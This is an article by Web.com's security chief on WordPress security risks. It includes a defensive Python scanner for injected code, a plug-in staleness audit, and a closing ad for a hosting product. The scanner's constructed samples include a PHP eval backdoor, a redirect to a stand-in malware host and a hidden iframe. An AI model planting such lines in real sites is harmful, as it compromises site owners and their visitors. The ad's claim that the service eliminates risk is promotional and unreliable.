By Geof Birchall, Chief Security Officer at Web.com
For more than 12 years now, the free open source content management system (CMS) WordPress has been available to website owners, large and small. It’s not an exaggeration to say it powers much of the web. In January 2015, it was estimated that WordPress was the foundation of 23 percent of the top 10 million most visited sites on the web. WordPress is the most popular CMS in the world—over 60 million websites are built on it.
There are some solid reasons why WordPress has gained this level of acceptance. But there are also real and present risks that it presents to its users. And ironically, those risks are directly related to what makes WordPress great.
First, let’s talk about the strengths of WordPress. One of the key drivers of its acceptance has been extensibility. WordPress was built so that its core functionality can be extended simply by installing plug-ins. Most plug-ins add a single, narrow capability that a particular site owner needs: search engine optimization, multi-user login, navigation menus or image rotation, for example. There are over 40,000 plug-ins available for the WordPress platform, but beware: not all plug-ins are equal. Every plug-in you install is PHP that runs inside WordPress with the same access to your database and files as WordPress itself, so a flawed plug-in hands evildoers an attack surface to corrupt or hijack your website.
When you are choosing a plug-in for your WordPress site, pick one that has a living, healthy community behind it. Many plug-ins are written by a user to solve a problem they happened to have, and are then orphaned and never updated again. Over time, vulnerabilities in such a plug-in are introduced or, more often, simply revealed, and nobody is left to fix them. Attackers use search engines like Google to trawl the Internet for sites running these vulnerable plug-ins (a plug-in’s folder under wp-content/plugins/ is usually visible in a page’s HTML source) and add those sites to their target lists.
The second big plus for WordPress is its support for themes. Having the ability to quickly and seamlessly re-skin a website without touching its content is brilliant. It achieves the goal of separating content from presentation, and makes it possible for a small business to present a fresh or seasonal look to its audience without confusing its customers. But themes are code too (PHP templates and JavaScript), and just like plug-ins they can carry undetected vulnerabilities that put your site at risk.
And finally, the core of the WordPress boom has been the free, open-source nature of the platform. That immediately reduces the cost to the business of using WordPress and allows it to run on a low-cost stack (Linux/Apache/MySQL/PHP). The dark twin of this openness is that vulnerability researchers, good and bad, will inevitably discover any weakness in the core application, and will either report it ethically or sell it as a zero-day (a vulnerability for which no patch is yet available). The day a new WordPress zero-day becomes known is a busy one for hackers, service providers and small and medium business owners alike, as they race to exploit or mitigate it.
A conversation I hear a lot from end-users of WordPress goes something like this…
“Why should I care about my WordPress blog/site? I don’t have anything worth stealing”.
The fact is, you do. You just don’t recognize what that resource is. Many attacks on WordPress are done in an effort to inject malicious code into your site. That code may serve malware straight to your visitors’ browsers, or, more blatantly, redirect them to another site loaded with malware. Your visitors come to you because they trust you as a source. By becoming a link in the attack chain, you amplify the attack and damage your own reputation on the Web.
Another common scenario I see is an attacker exploiting a vulnerable WordPress site simply to use its resources in a downstream attack. One WordPress site spewing spam to a mailing list is bad enough. But 10,000 of them under one attacker’s control is a pretty good foundation for a distributed denial-of-service (DDoS) attack.
The most painful consequence is that it is you, the WordPress owner, who feels the backlash. Your ISP or hosting company may shut your site down. Your domain may land on one of the many industry blacklists, such as browser safe-browsing lists or email spam blocklists. And your potential customers may see warnings in their browser telling them that your site is untrustworthy.
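To make the “malicious code injected into your site” scenario concrete, here is an added example (not code from the original article or from Web.com) of a small heuristic scanner that looks for the indicators such injections usually leave in theme and plug-in files: a hidden iframe, a JavaScript redirect to an unknown host, or PHP that `eval`s a decoded payload. The file contents, paths and the trusted-host allowlist are constructed for the example; they are not real malware samples.

```python
"""Heuristic scan of WordPress theme/plug-in files for injected-code indicators.

Added example. Any hit is a reason to inspect the file by hand, not proof of
compromise: legitimate code occasionally matches these patterns too.
"""
import re
from urllib.parse import urlparse

# Hosts this site legitimately loads scripts/iframes from (assumed allowlist).
TRUSTED_HOSTS = {"example.com", "www.example.com", "fonts.googleapis.com"}

# Patterns commonly seen in injected PHP/JS payloads.
INDICATORS = {
    # PHP: eval() of an obfuscated/encoded payload, the classic backdoor shape.
    "php_eval_decode": re.compile(
        r"eval\s*\(\s*(base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(", re.I),
    # PHP: variable function name called with raw request data, e.g. $f($_POST['c']).
    "php_dynamic_call": re.compile(
        r"\$[A-Za-z_]\w*\s*\(\s*\$_(GET|POST|REQUEST|COOKIE)\[", re.I),
    # HTML: iframe with zero width/height, used to load a malware landing page unseen.
    "hidden_iframe": re.compile(
        r"<iframe[^>]*(width|height)\s*=\s*[\"']?0[\"']?[^>]*>", re.I),
    # JS: eval over character codes, a common obfuscation wrapper.
    "js_charcode_eval": re.compile(r"eval\s*\(\s*String\.fromCharCode\s*\(", re.I),
    # JS: hard-coded redirect of the visitor to an absolute URL.
    "js_location_redirect": re.compile(
        r"(window\.|document\.)?location(\.href)?\s*=\s*[\"']https?://", re.I),
}
# Any <script src=...> or <iframe src=...>; the host is checked against the allowlist.
EXTERNAL_SRC = re.compile(r"<(?:script|iframe)[^>]+src\s*=\s*[\"']([^\"']+)[\"']", re.I)


def scan_text(text):
    """Return the indicator names that fire on `text` (sorted), followed by an
    'untrusted_src:<host>' entry for each external script/iframe host not allowlisted."""
    hits = sorted(name for name, rx in INDICATORS.items() if rx.search(text))
    for url in EXTERNAL_SRC.findall(text):
        host = urlparse(url).hostname  # None for relative paths, which are skipped
        if host and host.lower() not in TRUSTED_HOSTS:
            hits.append(f"untrusted_src:{host.lower()}")
    return hits


def scan_files(files):
    """files: {path: contents}. Returns {path: hits} for every file with at least one hit."""
    report = {}
    for path, text in files.items():
        hits = scan_text(text)
        if hits:
            report[path] = hits
    return report


# Constructed sample files: a clean header, a footer with an injected visitor
# redirect plus hidden iframe, and a PHP backdoor dropped into an old plug-in.
SAMPLE_FILES = {
    "wp-content/themes/shop/header.php":
        '<html><head><script src="https://fonts.googleapis.com/css"></script></head>',
    "wp-content/themes/shop/footer.php":
        "<script>if(!document.cookie.match('seen')){"
        "window.location='http://malware.example.net/land'}</script>"
        '<iframe src="http://malware.example.net/x" width="0" height="0"></iframe>',
    "wp-content/plugins/old-gallery/img.php":
        "<?php eval(base64_decode($_POST['p'])); ?>",
}

if __name__ == "__main__":
    for path, hits in scan_files(SAMPLE_FILES).items():
        print(path, "->", ", ".join(hits))
```

Run against a real install you would walk `wp-content/` and feed each file’s contents to `scan_files`; the allowlist is the part to tune first, because a site that legitimately embeds third-party widgets will otherwise produce noise.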
So how do you take advantage of the value that WordPress provides without falling victim to an attack?
The key is maintenance.
You have to commit to ongoing maintenance of your website that keeps you on the latest supported versions of PHP, WordPress and every plug-in and theme you have chosen to use. The trap is that this forces one of two choices: either you gain the skills to maintain your WordPress site yourself, or you outsource the work to a trusted partner.
As a small business owner, it is tempting to try to control costs by doing it yourself, but you do so at the risk of diverting precious time and effort away from your core business. Your business expertise is better spent on bringing great products or content to the Web, in my opinion. Leave the maintenance and upgrades to folks who have made that part of their core business.
Don’t get too attached to a plug-in. If it no longer has a healthy community behind it, it presents a real risk to your business and should be removed or replaced.
There are some great resources on the Web to help you quantify the risk of your WordPress installation. Check the official list of vulnerabilities in the core WordPress product, and use WPScan to assess the exposure of your own assets. But be warned: it’s not as simple as the tools make out, and you are far better served by finding a good-quality partner to handle this work for you.
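The two rules above, keep everything current and drop any plug-in that no longer has a living maintainer, can be turned into a repeatable check. The following is an added example, not code from the original article or from Web.com. The record fields (`version`, `last_updated`, `tested`) mirror what the WordPress.org plug-in directory publishes for each plug-in, but every slug, version, date and threshold here is constructed for illustration and nothing is fetched over the network.

```python
"""Flag installed WordPress plug-ins that are outdated or look abandoned.

Added example. Thresholds are assumptions a site owner would tune; the sample
inventory and directory records are constructed, not real plug-ins.
"""
from datetime import date

# Policy thresholds (assumed values).
MAX_DAYS_SINCE_UPDATE = 365 * 2   # no release in two years -> probably orphaned
MAX_WP_RELEASE_GAP = 2            # "tested up to" more than two WordPress releases behind


def parse_version(v):
    """'4.1.2' -> (4, 1, 2); missing components are padded so tuples compare sanely."""
    parts = [int(p) for p in v.split(".")[:3]]
    return tuple(parts + [0] * (3 - len(parts)))


def wp_release_gap(tested, current):
    """Number of WordPress releases between `tested` and `current`.

    WordPress numbers releases MAJOR.MINOR (patches are a third component) and
    rolls over at .9 (3.9 -> 4.0, 4.9 -> 5.0), so the gap is ten per major step
    plus the difference in the second component.
    """
    t, c = parse_version(tested), parse_version(current)
    return (c[0] - t[0]) * 10 + (c[1] - t[1])


def audit_plugin(installed, info, today, current_wp):
    """Return a list of findings (strings) for one plug-in; empty means healthy.

    installed: {'slug', 'version'} as read from the site.
    info:      {'version', 'last_updated' (YYYY-MM-DD), 'tested'} from the plug-in
               directory, or None if the directory no longer lists the plug-in.
               (The live API returns a longer timestamp string; normalise it to a
               date before calling this.)
    """
    findings = []
    if info is None:
        findings.append("not listed in the plug-in directory (closed or never published); treat as unsupported")
        return findings
    if parse_version(installed["version"]) < parse_version(info["version"]):
        findings.append(f"outdated: {installed['version']} installed, {info['version']} available")
    age = (today - date.fromisoformat(info["last_updated"])).days
    if age > MAX_DAYS_SINCE_UPDATE:
        findings.append(f"no release for {age} days; likely abandoned")
    gap = wp_release_gap(info["tested"], current_wp)
    if gap > MAX_WP_RELEASE_GAP:
        findings.append(f"only tested up to WordPress {info['tested']} ({gap} releases behind {current_wp})")
    return findings


def audit_site(installed_plugins, directory_info, today, current_wp):
    """installed_plugins: list of {'slug','version'}; directory_info: {slug: info or None}."""
    return {p["slug"]: audit_plugin(p, directory_info.get(p["slug"]), today, current_wp)
            for p in installed_plugins}


# Constructed sample: what an audit run in early 2015 against WordPress 4.1 might see.
TODAY = date(2015, 3, 1)
CURRENT_WP = "4.1"
INSTALLED = [
    {"slug": "good-seo", "version": "2.4.0"},
    {"slug": "old-gallery", "version": "1.0"},
    {"slug": "stale-login", "version": "3.1"},
    {"slug": "vanished-widget", "version": "0.9"},
]
DIRECTORY = {
    "good-seo": {"version": "2.4.0", "last_updated": "2015-02-10", "tested": "4.1"},
    "old-gallery": {"version": "1.2", "last_updated": "2012-06-30", "tested": "3.4"},
    "stale-login": {"version": "3.1", "last_updated": "2014-11-01", "tested": "4.0"},
    "vanished-widget": None,
}

if __name__ == "__main__":
    for slug, findings in audit_site(INSTALLED, DIRECTORY, TODAY, CURRENT_WP).items():
        print(slug, "->", "; ".join(findings) or "OK")
```

The “not listed” case is the one owners most often miss: a plug-in that the directory has closed produces no update notice in the WordPress dashboard, so it silently stays at whatever version was last installed.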
Protect your WordPress website by using Secure WordPress Hosting from Network Solutions. Secure WordPress eliminates the risks associated with outdated plug-ins and those with known vulnerabilities; provides security updates to the WordPress® platform and plug-ins; scans for and removes malware; creates daily site backups; guards against DDoS attacks, SQL injection, cross-site scripting and more! Learn more.
Geof Birchall is Chief Security Officer at Web.com